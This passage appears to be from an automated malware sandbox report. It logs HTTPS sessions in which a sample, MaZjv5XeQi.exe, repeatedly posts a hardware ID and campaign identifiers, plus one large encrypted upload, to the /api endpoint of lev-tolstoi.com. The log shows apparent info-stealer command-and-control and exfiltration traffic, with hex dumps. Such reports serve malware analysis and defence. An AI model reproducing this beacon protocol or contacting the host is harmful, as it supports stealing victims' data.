                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.549708104.21.66.864435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:24 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=OP9KY22WZVVGYZ4
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 15059
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:24 UTC15059OUTData Raw: 2d 2d 4f 50 39 4b 59 32 32 57 5a 56 56 47 59 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4f 50 39 4b 59 32 32 57 5a 56 56 47 59 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 50 39 4b 59 32 32 57 5a 56 56 47 59 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 50 39 4b 59
                                                                                                                                                                                                                                Data Ascii: --OP9KY22WZVVGYZ4Content-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--OP9KY22WZVVGYZ4Content-Disposition: form-data; name="pid"2--OP9KY22WZVVGYZ4Content-Disposition: form-data; name="lid"PsFKDg--pablo--OP9KY
                                                                                                                                                                                                                                2024-12-26 12:14:25 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:25 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=94nedr24ue9e1i1lu5gcr43rkl; expires=Mon, 21 Apr 2025 06:01:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdT1kSYbtyZ6v4XqfUFJpQY%2Fkwvmj8bZo5Y0b9lWKTaWAwzT7%2FqadwxvP35QOYAEjyAPSi87KRDXQfJ7nS%2F1nDm9KnM827CX5SMDtfl%2B2p5pcehbU9Z9F7Q6t7eyzywXNLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fd8d2a3442ab-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1568&rtt_var=618&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15995&delivery_rate=1729857&cwnd=199&unsent_bytes=0&cid=50ba4a41be55b4ef&ts=871&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-26 12:14:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.549709104.21.66.864435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:27 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=9WS1RYM3
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 20507
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:27 UTC15331OUTData Raw: 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 39 57 53 31 52 59 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                Data Ascii: --9WS1RYM3Content-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--9WS1RYM3Content-Disposition: form-data; name="pid"3--9WS1RYM3Content-Disposition: form-data; name="lid"PsFKDg--pablo--9WS1RYM3Content-Disposit
                                                                                                                                                                                                                                2024-12-26 12:14:27 UTC5176OUTData Raw: 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00
                                                                                                                                                                                                                                Data Ascii: un 4F([:7s~X`nO`i`u?
                                                                                                                                                                                                                                2024-12-26 12:14:28 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:27 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=486r2trtuqhn2209f1nig3l0bc; expires=Mon, 21 Apr 2025 06:01:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjM%2BRizAcsAZq%2FLJuQChdeD03vE7mhBRV9W0gKlIPqteiuHfAlD2oRLZX1n9Yc2j%2FfM25mlGjQvwlNCvUB9cQo3xyZUZDDC2FW%2FvwcNy%2FQWJ4rM3O39ieExrrv%2FZEzYQOOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fd9cbdbd428e-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1626&rtt_var=623&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21458&delivery_rate=1795817&cwnd=222&unsent_bytes=0&cid=4ea548a367585dab&ts=975&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-26 12:14:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.549712172.67.157.2544435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:29 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=CW22BAAPRYQOSPW
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 1251
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:29 UTC1251OUTData Raw: 2d 2d 43 57 32 32 42 41 41 50 52 59 51 4f 53 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 57 32 32 42 41 41 50 52 59 51 4f 53 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 57 32 32 42 41 41 50 52 59 51 4f 53 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 43 57 32 32 42
                                                                                                                                                                                                                                Data Ascii: --CW22BAAPRYQOSPWContent-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--CW22BAAPRYQOSPWContent-Disposition: form-data; name="pid"1--CW22BAAPRYQOSPWContent-Disposition: form-data; name="lid"PsFKDg--pablo--CW22B
                                                                                                                                                                                                                                2024-12-26 12:14:30 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=7rk8g0d522knviin9k847p34j0; expires=Mon, 21 Apr 2025 06:01:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7I5GjXVIAqM6e3vHot8yH1uoeBUgFTiaN337Pw40wv3rG6DLSC7q16pfDcSte7ugc9960o%2FKAHvbCNxNSq95KMaBtLuaTVK%2FsQjDmKJ%2B3PcuyINYiCaWNuKV8dJ0%2FVOXCc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fdaeaefe8c3c-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2065&rtt_var=784&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2164&delivery_rate=1388492&cwnd=224&unsent_bytes=0&cid=e07acf6110b523e8&ts=782&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-26 12:14:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.549715172.67.157.2544435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=21B385563K4
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 570977
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: --21B385563K4Content-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--21B385563K4Content-Disposition: form-data; name="pid"1--21B385563K4Content-Disposition: form-data; name="lid"PsFKDg--pablo--21B385563K4Cont
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be 01 24 82 4f 0d 94 66 25 9d 73 4e c7 e6 6a 21 8e 1c fa 74 01 58 f6 2b 42 63 0d ac 9d f5 2b 2d 36 43 11 92 e0 98 89 fc 70 e8 ec 02 71 29 ca df 30
                                                                                                                                                                                                                                Data Ascii: %!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1$Of%sNj!tX+Bc+-6Cpq)0
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29 d8 db 62 b0 b3 e7 94 52 d9 52 e3 26 16 0e 7a fa d3 3b 31 af 76 59 2b 44 94 83 bd c3 0c 7c d2 3e 25 5f 6e 31 3d aa 04 b8 5e 3d 9e 2a 62 dc 4a dd
                                                                                                                                                                                                                                Data Ascii: 6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|zTG)bRR&z;1vY+D|>%_n1=^=*bJ
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06 0a e3 ff 4c 2f 4b 23 66 5a 82 36 a3 64 16 74 85 5c 95 be 0e 11 7b 6e fd f0 9d 65 37 6a e9 39 7f ba 3b fb 39 63 55 f9 74 64 90 dc a6 0e 00 2e 9a
                                                                                                                                                                                                                                Data Ascii: t+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=L/K#fZ6dt\{ne7j9;9cUtd.
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9 cf 47 b5 68 6e 0a 2a 30 27 2d 9c 21 98 9e 38 15 91 4e d1 ae e0 a8 7a ab c0 d6 ca e9 44 2d 96 2a b8 48 87 cd 3f 37 9e d5 41 04 c1 9f bf e4 13 4f
                                                                                                                                                                                                                                Data Ascii: W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422Ghn*0'-!8NzD-*H?7AO
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00 a2 8e f4 ae e9 41 43 92 e9 24 36 c5 05 46 3e d7 c1 c1 ee 99 b5 80 4d 17 6c 36 90 da de 78 90 61 3a 79 4f 65 76 bb d3 de b0 97 79 97 e9 34 f8 76
                                                                                                                                                                                                                                Data Ascii: &1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9AC$6F>Ml6xa:yOevy4v
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60 be b3 30 9f 12 d9 24 7d e0 37 d6 8d ae 11 03 66 2d 1e fb 60 9b 47 b0 17 63 83 2f b7 4d 8e ea 07 09 ea 83 75 85 16 d2 98 81 4c 8c 8f 97 ca 8b cc
                                                                                                                                                                                                                                Data Ascii: ""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5~}`0$}7f-`Gc/MuL
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf c8 c3 1a 91 7d 19 43 b6 b3 ec d9 1f 22 ea b4 87 63 e0 73 7b a5 45 ba 4f 1c 71 cf d4 84 51 71 8f dc 5a d6 4e a2 4f 74 28 1c 6c d8 44 f4 81 5d 0d
                                                                                                                                                                                                                                Data Ascii: /+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#M}C"cs{EOqQqZNOt(lD]
